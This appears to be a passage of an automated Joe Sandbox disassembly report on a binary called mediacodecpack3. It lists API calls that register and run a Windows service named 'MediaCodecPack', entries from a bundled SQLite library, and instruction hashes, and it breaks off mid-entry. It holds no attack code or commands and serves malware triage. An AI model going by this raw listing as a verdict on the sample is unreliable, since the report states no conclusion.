                                                                                            • String ID:
                                                                                            • API String ID: 326482775-0
                                                                                            • Opcode ID: de94f0bba3b8b54078f1ceecce583a965f8e010bb36370f6070bcd8bc28ee8b0
                                                                                            • Instruction ID: 7c1586c82cd56d85cf32929a5cd575737867df940847ca2bf63216634e784e33
                                                                                            • Opcode Fuzzy Hash: de94f0bba3b8b54078f1ceecce583a965f8e010bb36370f6070bcd8bc28ee8b0
                                                                                            • Instruction Fuzzy Hash: 0E214DB0A043049BDB04DFA9C480B9EF7FAEFA8354F04C429E8959B340E778D8418B51
                                                                                            APIs
                                                                                            • CreateServiceA.ADVAPI32 ref: 00401CFB
                                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 00401EEA
                                                                                            • CloseServiceHandle.ADVAPI32(?), ref: 0040D23C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2980624065.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2980624065.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: Service$CloseHandle$Create
                                                                                            • String ID:
                                                                                            • API String ID: 2095555506-0
                                                                                            • Opcode ID: 798336170624c8ac89b9a2c31719ae8e1c376ef6816bfeab9d8cee1d71777bcc
                                                                                            • Instruction ID: 94f379f039eced8726fb3cb338ec06236e1c18fcefb958c6377dd5f00325babe
                                                                                            • Opcode Fuzzy Hash: 798336170624c8ac89b9a2c31719ae8e1c376ef6816bfeab9d8cee1d71777bcc
                                                                                            • Instruction Fuzzy Hash: A6D09E31D44114EACF201BD19D48D6E2E79A7443A4F2504BAE501760F0C6799946FA5A
                                                                                            APIs
                                                                                            • sqlite3_mutex_enter.SQLITE3 ref: 6090C1EA
                                                                                            • sqlite3_mutex_leave.SQLITE3 ref: 6090C22F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                            • String ID:
                                                                                            • API String ID: 1477753154-0
                                                                                            • Opcode ID: 8c595cf50166d2d57a1b46d7a61a8743a20f226779b5cb212a2500e19f50b056
                                                                                            • Instruction ID: fc120f7ed3300d8301d0f99cb769197b575d5683181bd6b289e4b53452841bc5
                                                                                            • Opcode Fuzzy Hash: 8c595cf50166d2d57a1b46d7a61a8743a20f226779b5cb212a2500e19f50b056
                                                                                            • Instruction Fuzzy Hash: 6501F4715042548BDB449F2EC4C576EBBEAEF65318F048469DD419B326D374D882CBA1
                                                                                            APIs
                                                                                              • Part of subcall function 6092535E: sqlite3_log.SQLITE3 ref: 60925406
                                                                                            • sqlite3_mutex_leave.SQLITE3 ref: 609255B2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_logsqlite3_mutex_leave
                                                                                            • String ID:
                                                                                            • API String ID: 1465156292-0
                                                                                            • Opcode ID: 61f2b65abbb078f396bfa931b2809e4962fa985140118a0fa907d432528e7d54
                                                                                            • Instruction ID: 19c4c58ecb434a21204d9b38047e93a23a7f28015e8477a734fda6841bb58fe8
                                                                                            • Opcode Fuzzy Hash: 61f2b65abbb078f396bfa931b2809e4962fa985140118a0fa907d432528e7d54
                                                                                            • Instruction Fuzzy Hash: 56317AB4A082188FCB04DF69D880A8EBBF6FF99314F008559FC5897348D734D940CBA5
                                                                                            APIs
                                                                                              • Part of subcall function 6092535E: sqlite3_log.SQLITE3 ref: 60925406
                                                                                            • sqlite3_mutex_leave.SQLITE3 ref: 60925508
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_logsqlite3_mutex_leave
                                                                                            • String ID:
                                                                                            • API String ID: 1465156292-0
                                                                                            • Opcode ID: 7f15987c0945e0fd4273a36fcce91cc0d916abb620506d2e7fdad6d0c82ef640
                                                                                            • Instruction ID: ad89f0bb34aa7175efe61e1ac22fb0c12735e6005c3b9edbf096fd229bca234b
                                                                                            • Opcode Fuzzy Hash: 7f15987c0945e0fd4273a36fcce91cc0d916abb620506d2e7fdad6d0c82ef640
                                                                                            • Instruction Fuzzy Hash: 5A01A475B107148BCB109F2ACC8164BBBFAEF68254F05991AEC41DB315D775ED458BC0
                                                                                            APIs
                                                                                              • Part of subcall function 6092535E: sqlite3_log.SQLITE3 ref: 60925406
                                                                                            • sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_logsqlite3_mutex_leave
                                                                                            • String ID:
                                                                                            • API String ID: 1465156292-0
                                                                                            • Opcode ID: ebbe32869a67294cb2d54c108597a832b3743d43329dcf341f64f2493053d601
                                                                                            • Instruction ID: 4fd0dfe8dd6226820e052206e0db6187a6d8a97f2116fb4a305c2fd2856f8961
                                                                                            • Opcode Fuzzy Hash: ebbe32869a67294cb2d54c108597a832b3743d43329dcf341f64f2493053d601
                                                                                            • Instruction Fuzzy Hash: 94F08CB5A002099BCB00DF2AD88088ABBBAFF98264B05952AEC049B314D770E941CBD0
                                                                                            APIs
                                                                                            • StartServiceCtrlDispatcherA.ADVAPI32(?), ref: 0040DF4C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2980624065.000000000040B000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2980624065.0000000000400000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: CtrlDispatcherServiceStart
                                                                                            • String ID:
                                                                                            • API String ID: 3789849863-0
                                                                                            • Opcode ID: 4fe4cdbd69d76611cbe8f8d839fbcf879ed414cccbfa791050e202b1d5f79f32
                                                                                            • Instruction ID: da040a5c410dac6804bc47ba04513fdabb8688a912b3c46f63b6c3d26f8cee3d
                                                                                            • Opcode Fuzzy Hash: 4fe4cdbd69d76611cbe8f8d839fbcf879ed414cccbfa791050e202b1d5f79f32
                                                                                            • Instruction Fuzzy Hash: B7E09A30811919DBDB50AF60DE887DA73B4FB82751F0081F6C84AB6191C7308A9ACF9A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2980624065.000000000040B000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2980624065.0000000000400000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7b3572c4825024628219a14e3466c11b8526f5c245e45a2c5ada6b05d28a57a2
                                                                                            • Instruction ID: 77de89feb31afb9f7e0b899b04aa460afec8cc02b7427acd4b9af8aa9f5f91e1
                                                                                            • Opcode Fuzzy Hash: 7b3572c4825024628219a14e3466c11b8526f5c245e45a2c5ada6b05d28a57a2
                                                                                            • Instruction Fuzzy Hash: A8E0BF7AD554658FCB00CA6DD9949EEBB70AA0472971A4145AC5037385C234AC41C6D1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5c5aa561fe8b7943dde2a358ba30c2c8876ef78bddd50c77f68009583e67d90a
                                                                                            • Instruction ID: 29002ccca7877ead4b7e7e784383ace88c03f26ddf616943a2b43c0eb71ea2e3
                                                                                            • Opcode Fuzzy Hash: 5c5aa561fe8b7943dde2a358ba30c2c8876ef78bddd50c77f68009583e67d90a
                                                                                            • Instruction Fuzzy Hash: 36E0E2B850430DABDF00CF09D8C188A7BAAFB08364F10C119FC190B305C371E9548BA1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d3c407e99ff1326d716251d27052f3514f6d3ace0f30ccd24b81610f61b1d9b8
                                                                                            • Instruction ID: aa639d4c52eda77921d109c173628d401b16d57fa3137d2b917a91732d8775c8
                                                                                            • Opcode Fuzzy Hash: d3c407e99ff1326d716251d27052f3514f6d3ace0f30ccd24b81610f61b1d9b8
                                                                                            • Instruction Fuzzy Hash: D7C01265704208574B00E92DE8C154577AA9718164B108039E80B87301D975ED084291
                                                                                            APIs
                                                                                            • sqlite3_initialize.SQLITE3 ref: 6096C5BE
                                                                                              • Part of subcall function 60912453: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 609124D1
                                                                                            • sqlite3_log.SQLITE3 ref: 6096C5FC
                                                                                            • sqlite3_free.SQLITE3 ref: 6096C67E
                                                                                            • sqlite3_free.SQLITE3 ref: 6096CD71
                                                                                            • sqlite3_mutex_leave.SQLITE3 ref: 6096CD80
                                                                                            • sqlite3_errcode.SQLITE3 ref: 6096CD88
                                                                                            • sqlite3_close.SQLITE3 ref: 6096CD97
                                                                                            • sqlite3_create_function.SQLITE3 ref: 6096CDF8
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_free$sqlite3_closesqlite3_create_functionsqlite3_errcodesqlite3_initializesqlite3_logsqlite3_mutex_entersqlite3_mutex_leave
                                                                                            • String ID: BINARY$NOCASE$RTRIM$porter$rtree$rtree_i32$simple
                                                                                            • API String ID: 1320758876-2501389569
                                                                                            • Opcode ID: 6bfcb0ec024900a9d9b4e92c8a495cd7f0e11888819caa106d9e2d842adf35f2
                                                                                            • Instruction ID: 66f98c4e8467cc0752991b2fada45a5d6d89a43a55ba94f1559c09c68fc79e30
                                                                                            • Opcode Fuzzy Hash: 6bfcb0ec024900a9d9b4e92c8a495cd7f0e11888819caa106d9e2d842adf35f2
                                                                                            • Instruction Fuzzy Hash: 7A024BB05183019BEB119F64C49536ABFF6BFA1348F11882DE8959F386D7B9C845CF82
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_free$sqlite3_snprintf$sqlite3_mutex_entersqlite3_win32_mbcs_to_utf8
                                                                                            • String ID: \$winFullPathname1$winFullPathname2$winFullPathname3$winFullPathname4
                                                                                            • API String ID: 937752868-2111127023
                                                                                            • Opcode ID: 790c833cc1fbb367a9c2b03a48d0fe6427ec60a778556f52a2f7a42315cae969
                                                                                            • Instruction ID: 65a1564e5812e901c47d2d0e8e64920046ae54dd737849fc0956122b524b53c9
                                                                                            • Opcode Fuzzy Hash: 790c833cc1fbb367a9c2b03a48d0fe6427ec60a778556f52a2f7a42315cae969
                                                                                            • Instruction Fuzzy Hash: 19512C706187018FE700AF69D88575DBFF6AFA5708F10C81DE8999B214EB78C845DF42
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcmp$sqlite3_mprintf$sqlite3_malloc$sqlite3_freesqlite3_vfs_find
                                                                                            • String ID: @$access$cache
                                                                                            • API String ID: 4158134138-1361544076
                                                                                            • Opcode ID: 19065094f7a61ae5fa0f118773a69bd69932ab9bc71fb499c0e2e31449818374
                                                                                            • Instruction ID: 35071b2ec389daa84eb338d99e29a1052eb2425681bc363379ff67fe3f9a0dd7
                                                                                            • Opcode Fuzzy Hash: 19065094f7a61ae5fa0f118773a69bd69932ab9bc71fb499c0e2e31449818374
                                                                                            • Instruction Fuzzy Hash: 27D19E75D183458BDB11CF69E58039EBBF7AFAA304F20846ED4949B349D339D882CB52
                                                                                            APIs
                                                                                            Strings
                                                                                            • SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0, xrefs: 609486C8
                                                                                            • SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence' , xrefs: 60948748
                                                                                            • ATTACH '' AS vacuum_db;, xrefs: 60948529
                                                                                            • BEGIN;, xrefs: 609485DB
                                                                                            • SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %' , xrefs: 609486E8
                                                                                            • SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';, xrefs: 60948768
                                                                                            • PRAGMA vacuum_db.synchronous=OFF, xrefs: 609485BB
                                                                                            • ATTACH ':memory:' AS vacuum_db;, xrefs: 60948534
                                                                                            • SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0, xrefs: 60948728
                                                                                            • SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %', xrefs: 60948708
                                                                                            • INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0), xrefs: 60948788
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_log
                                                                                            • String ID: ATTACH '' AS vacuum_db;$ATTACH ':memory:' AS vacuum_db;$BEGIN;$INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)$PRAGMA vacuum_db.synchronous=OFF$SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %' $SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0$SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'$SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence' $SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';$SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
                                                                                            • API String ID: 632333372-52344843
                                                                                            • Opcode ID: d52540ff3cd5a889f8fcb2175177c5c293f6bf3e96b3409faf11301466b535e5
                                                                                            • Instruction ID: 17dae18cb22bd420f764556e48f7e631e7f528851c991f2db59136dec61311d4
                                                                                            • Opcode Fuzzy Hash: d52540ff3cd5a889f8fcb2175177c5c293f6bf3e96b3409faf11301466b535e5
                                                                                            • Instruction Fuzzy Hash: 1202F6B0A046299BDB2ACF18C88179EB7FABF65304F1081D9E858AB355D771DE81CF41
                                                                                            APIs
                                                                                            • RegisterServiceCtrlHandlerA.ADVAPI32(MediaCodecPack,Function_000019C8), ref: 00401A25
                                                                                            • SetServiceStatus.ADVAPI32(0040BE40), ref: 00401A84
                                                                                            • GetLastError.KERNEL32 ref: 00401A86
                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00401A93
                                                                                            • GetLastError.KERNEL32 ref: 00401AB4
                                                                                            • SetServiceStatus.ADVAPI32(0040BE40), ref: 00401AE4
                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00001897,00000000,00000000,00000000), ref: 00401AF0
                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00401AF9
                                                                                            • CloseHandle.KERNEL32 ref: 00401B05
                                                                                            • SetServiceStatus.ADVAPI32(0040BE40), ref: 00401B2E
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2980624065.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2980624065.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: Service$Status$CreateErrorLast$CloseCtrlEventHandleHandlerObjectRegisterSingleThreadWait
                                                                                            • String ID: MediaCodecPack
                                                                                            • API String ID: 3346042915-199385074
                                                                                            • Opcode ID: cca009b725d80f918f5385075355cc3301aa37e01b24cb08a35ee5e129ff42f2
                                                                                            • Instruction ID: 532dd47a677431e4b3997e11c6aba14a110aa56271c5c3b89ba5cdee744870bf
                                                                                            • Opcode Fuzzy Hash: cca009b725d80f918f5385075355cc3301aa37e01b24cb08a35ee5e129ff42f2
                                                                                            • Instruction Fuzzy Hash: D621B8B1501244ABD3206F16EF48E967FB8EB95B55B15403EE245B23B1CBF90444CBED
                                                                                            APIs
                                                                                              • Part of subcall function 609296D1: sqlite3_value_bytes.SQLITE3 ref: 609296F3
                                                                                              • Part of subcall function 609296D1: sqlite3_mprintf.SQLITE3 ref: 60929708
                                                                                              • Part of subcall function 609296D1: sqlite3_free.SQLITE3 ref: 6092971B
                                                                                              • Part of subcall function 6095FFB2: sqlite3_bind_int64.SQLITE3 ref: 6095FFFA
                                                                                              • Part of subcall function 6095FFB2: sqlite3_step.SQLITE3 ref: 60960009
                                                                                              • Part of subcall function 6095FFB2: sqlite3_reset.SQLITE3 ref: 60960019
                                                                                              • Part of subcall function 6095FFB2: sqlite3_result_error_code.SQLITE3 ref: 60960043
                                                                                            • sqlite3_malloc.SQLITE3 ref: 60960384
                                                                                            • sqlite3_free.SQLITE3 ref: 609605EA
                                                                                            • sqlite3_result_error_code.SQLITE3 ref: 6096060D
                                                                                            • sqlite3_free.SQLITE3 ref: 60960618
                                                                                            • sqlite3_result_text.SQLITE3 ref: 6096063C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_free$sqlite3_result_error_code$sqlite3_bind_int64sqlite3_mallocsqlite3_mprintfsqlite3_resetsqlite3_result_textsqlite3_stepsqlite3_value_bytes
                                                                                            • String ID: offsets
                                                                                            • API String ID: 463808202-2642679573
                                                                                            • Opcode ID: 496dcd0dbd0e24e84f3ae9a4f9495b5d667a7098f4014ef95464c797b1727b83
                                                                                            • Instruction ID: 1101d6838161b799219a4b3d5732631e197d31251dd2d8b91c34f261bd2faa79
                                                                                            • Opcode Fuzzy Hash: 496dcd0dbd0e24e84f3ae9a4f9495b5d667a7098f4014ef95464c797b1727b83
                                                                                            • Instruction Fuzzy Hash: 72C1D374A183198FDB14CF59C580B8EBBF2BFA8314F2085A9E849AB354D734D985CF52
                                                                                            APIs
                                                                                            • sqlite3_value_text.SQLITE3 ref: 6091A3C1
                                                                                            • sqlite3_value_bytes.SQLITE3 ref: 6091A3D6
